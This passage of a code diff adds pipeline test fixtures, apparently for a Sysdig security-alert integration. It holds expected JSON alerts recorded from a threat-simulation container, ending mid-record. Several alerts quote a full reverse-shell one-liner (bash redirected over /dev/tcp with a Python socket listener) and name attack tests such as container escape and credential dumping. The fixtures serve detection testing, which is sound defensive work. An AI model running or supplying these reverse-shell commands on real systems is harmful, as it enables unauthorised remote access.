+{"id":"17dec30ec6c62db90219722f069818ce","agentId":58462617,"containerId":"1eb848eba226","type":"command","timestamp":1720026575933943300,"timestampRFC3339Nano":"2024-07-03T17:09:35.933943225Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}} +{"id":"17dec311bcc23cdab41a9d1b874f923f","agentId":58462617,"containerId":"1eb848eba226","type":"fileaccess","timestamp":1720026588650814700,"timestampRFC3339Nano":"2024-07-03T17:09:48.650814682Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}} +{"id":"164806f4c47ad9101117d87f8b574ecf","agentId":32212,"containerId":"397be1762fba","name":"nginx-76f9cf7469-k5kf7","timestamp":1606322948648718268,"timestampRFC3339Nano":"2020-11-25T16:49:08.648718268Z","type":"kubernetes","labels":{"host.hostName":"qa-k8smetrics","kubernetes.cluster.name":"demo-env-prom","kubernetes.namespace.name":"nginx","kubernetes.pod.name":"nginx-76f9cf7469-k5kf7"}} \ No newline at end of file diff --git a/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log-expected.json b/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log-expected.json new file mode 100644 index 00000000000..7ea34ab1df5 --- /dev/null +++ b/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log-expected.json @@ -0,0 +1,1709 @@ +{ + "expected": [ + { + "agent": { + "id": "58014837" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "event": { + "id": "17dec715376910362c8c3f62a4ceda2e", + "kind": "alert", + "provider": "syscall", + "severity": 7 + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "log": { + "syslog": { + "severity": { + "code": 7, + "name": "debug" + } + } + }, + "message": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "User Management Event Detected", + "ruleset": "Sysdig Runtime Activity Logs", + "version": "35" + }, + "sysdig": { + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "userdel tmp_suid_user", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/sbin/userdel", + "proc.name": "userdel", + "proc.pcmdline": "pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC)", + "proc.pid": "2140169", + "proc.pname": "pwsh", + "proc.ppid": "2140088", + "user.name": "root", + "user.uid": "0" + }, + "output": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "policyOrigin": "Sysdig", + "policyVersion": 35, + "ruleName": "User Management Event Detected", + "ruleTags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + "MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "event": { + "category": "runtime", + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec715376910362c8c3f62a4ceda2e", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Activity Logs", + "originator": "policy", + "severity": 7, + "source": "syscall", + "timestamp": 1720031001639981110, + "timestampRFC3339Nano": "2024-07-03T18:23:21.63998111Z", + "type": "policy" + }, + "tags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + "MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "threat.technique.id": [ + "T1136" + ] + }, + { + "agent": { + "id": "58014837" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "event": { + "id": "17dec7142e0084978fbafcb03e2cabca", + "kind": "alert", + "provider": "syscall", + "severity": 5 + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "log": { + "syslog": { + "severity": { + "code": 5, + "name": "notice" + } + } + }, + "message": "Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=1 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleset": "Sysdig Runtime Notable Events", + "version": "90" + }, + "sysdig": { + "actions": [ + { + "afterEventNs": 30000000000, + "beforeEventNs": 15000000000, + "errMsg": "maximum number of outstanding captures (1) reached", + "successful": false, + "token": "c708ed01-9700-4787-91a5-6b2fb9863c0a", + "type": "" + } + ], + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/bin/bash", + "proc.name": "bash", + "proc.pcmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.pid": "2140105", + "proc.pname": "bash", + "proc.ppid": "2140101", + "user.name": "root", + "user.uid": "0" + }, + "output": "Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=1 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "policyOrigin": "Sysdig", + "policyVersion": 90, + "ruleName": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleTags": [ + "container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "event": { + "category": "runtime", + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec7142e0084978fbafcb03e2cabca", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Notable Events", + "originator": "policy", + "severity": 5, + "source": "syscall", + "timestamp": 1720030997187167383, + "timestampRFC3339Nano": "2024-07-03T18:23:17.187167383Z", + "type": "policy" + }, + "tags": [ + "container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "threat.technique.id": [ + "T1059" + ] + }, + { + "agent": { + "id": "58462623" + }, + "cloud": { + "account": { + "id": "7a100e05-8316-474d-99c0-b824d0e86366" + }, + "instance": { + "id": "ba53fc47-1119-4cbb-af2b-6d38b0e56160" + }, + "machine": { + "type": "Standard_D8ds_v5" + }, + "provider": "azure", + "region": "eastus" + }, + "container": { + "id": "8736272bd5fb" + }, + "event": { + "id": "17e04791d768c4aba1e9c40d944b8598", + "kind": "alert", + "provider": "syscall", + "severity": 7 + }, + "host": { + "id": "7c:1e:52:0b:2b:61", + "mac": [ + "7C-1E-52-0B-2B-61" + ], + "name": "aks-userpool-12996081-vmss000001" + }, + "log": { + "syslog": { + "severity": { + "code": 7, + "name": "debug" + } + } + }, + "message": "Executing binary ruby with parent livenessprobe.s not part of base image mcr.microsoft.com/azuremonitor/containerinsights/ciprod on ama-logs under user root and execution path /usr/bin/ruby (proc.name=ruby proc.pname=livenessprobe.s fd.name=\\u003cNA\\u003e proc.cmdline=ruby /opt/dcr-config-parser.rb proc.pcmdline=livenessprobe.s /opt/livenessprobe.sh gparent=runc ggparent=containerd-shim gggparent=systemd evt.type=execveproc.args=/opt/dcr-config-parser.rb proc.pid=2817268 proc.cwd=/opt/ proc.ppid=2817253 proc.exepath=/usr/bin/ruby user.uid=0 user.loginuid=-1 user.loginname=\\u003cNA\\u003e user.name=root group.gid=0 group.name=root container.id=8736272bd5fb container.name=ama-logs image=mcr.microsoft.com/azuremonitor/containerinsights/ciprod:3.1.21)", + "orchestrator": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": "kube-system", + "resource": { + "name": "ama-logs-cxhbd", + "parent": { + "type": "daemonset" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Drop and execute new binary in container", + "ruleset": "Sysdig Runtime Activity Logs", + "version": "35" + }, + "sysdig": { + "agentId": 58462623, + "category": "runtime", + "containerId": "8736272bd5fb", + "content": { + "fields": { + "container.name": "ama-logs", + "proc.cmdline": "ruby /opt/dcr-config-parser.rb", + "proc.cwd": "/opt/", + "proc.exepath": "/usr/bin/ruby", + "proc.name": "ruby", + "proc.pcmdline": "livenessprobe.s /opt/livenessprobe.sh", + "proc.pid": "2817268", + "proc.pname": "livenessprobe.s", + "proc.ppid": "2817253", + "user.name": "root", + "user.uid": "0" + }, + "output": "Executing binary ruby with parent livenessprobe.s not part of base image mcr.microsoft.com/azuremonitor/containerinsights/ciprod on ama-logs under user root and execution path /usr/bin/ruby (proc.name=ruby proc.pname=livenessprobe.s fd.name=\\u003cNA\\u003e proc.cmdline=ruby /opt/dcr-config-parser.rb proc.pcmdline=livenessprobe.s /opt/livenessprobe.sh gparent=runc ggparent=containerd-shim gggparent=systemd evt.type=execveproc.args=/opt/dcr-config-parser.rb proc.pid=2817268 proc.cwd=/opt/ proc.ppid=2817253 proc.exepath=/usr/bin/ruby user.uid=0 user.loginuid=-1 user.loginname=\\u003cNA\\u003e user.name=root group.gid=0 group.name=root container.id=8736272bd5fb container.name=ama-logs image=mcr.microsoft.com/azuremonitor/containerinsights/ciprod:3.1.21)", + "policyOrigin": "Sysdig", + "policyVersion": 35, + "ruleName": "Drop and execute new binary in container", + "ruleTags": [ + "container", + "MITRE", + "MITRE_T1525_implant_internal_image", + "MITRE_TA0003_persistence" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "event": { + "category": "runtime", + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "type": "policy" + }, + "hostMac": "7c:1e:52:0b:2b:61", + "id": "17e04791d768c4aba1e9c40d944b8598", + "labels": { + "azure": { + "instanceId": "ba53fc47-1119-4cbb-af2b-6d38b0e56160", + "instanceName": "aks-userpool-12996081-vmss_1", + "instanceSize": "Standard_D8ds_v5" + }, + "cloudProvider": { + "account": { + "id": "7a100e05-8316-474d-99c0-b824d0e86366" + }, + "name": "azure", + "region": "eastus" + }, + "host": { + "hostName": "aks-userpool-12996081-vmss000001" + }, + "kubernetes": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": { + "name": "kube-system" + }, + "pod": { + "name": "ama-logs-cxhbd" + }, + "workload": { + "type": "daemonset" + } + } + }, + "machineId": "7c:1e:52:0b:2b:61", + "name": "Sysdig Runtime Activity Logs", + "originator": "policy", + "severity": 7, + "source": "syscall", + "timestamp": 1720453749365327019, + "timestampRFC3339Nano": "2024-07-08T15:49:09.365327019Z", + "type": "policy" + }, + "tags": [ + "container", + "MITRE", + "MITRE_T1525_implant_internal_image", + "MITRE_TA0003_persistence" + ], + "threat.technique.id": [ + "T1525" + ] + }, + { + "agent": { + "id": "58014837" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "event": { + "id": "17dec7142e00a9068fb9185f9aa66c21", + "kind": "alert", + "provider": "syscall", + "severity": 5 + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "log": { + "syslog": { + "severity": { + "code": 5, + "name": "notice" + } + } + }, + "message": "Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleset": "Sysdig Runtime Notable Events", + "version": "90" + }, + "sysdig": { + "actions": [ + { + "afterEventNs": 30000000000, + "beforeEventNs": 15000000000, + "errMsg": "maximum number of outstanding captures (1) reached", + "successful": false, + "token": "eb2b3e3c-ebc1-433f-88c7-2e032b75aadc", + "type": "" + } + ], + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/bin/bash", + "proc.name": "bash", + "proc.pcmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.pid": "2140105", + "proc.pname": "bash", + "proc.ppid": "2140101", + "user.name": "root", + "user.uid": "0" + }, + "output": "Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "policyOrigin": "Sysdig", + "policyVersion": 90, + "ruleName": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleTags": [ + "container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "event": { + "category": "runtime", + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec7142e00a9068fb9185f9aa66c21", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Notable Events", + "originator": "policy", + "severity": 5, + "source": "syscall", + "timestamp": 1720030997187176710, + "timestampRFC3339Nano": "2024-07-03T18:23:17.18717671Z", + "type": "policy" + }, + "tags": [ + "container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "threat.technique.id": [ + "T1059" + ] + }, + { + "cloud": { + "account": { + "id": "414773805239" + }, + "provider": "aws", + "region": "us-east-1" + }, + "event": { + "id": "17dec36048564c002c559dbdad20be41", + "kind": "alert", + "provider": "aws_cloudtrail", + "severity": 7 + }, + "log": { + "syslog": { + "severity": { + "code": 7, + "name": "debug" + } + } + }, + "message": "A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)", + "rule": { + "author": [ + 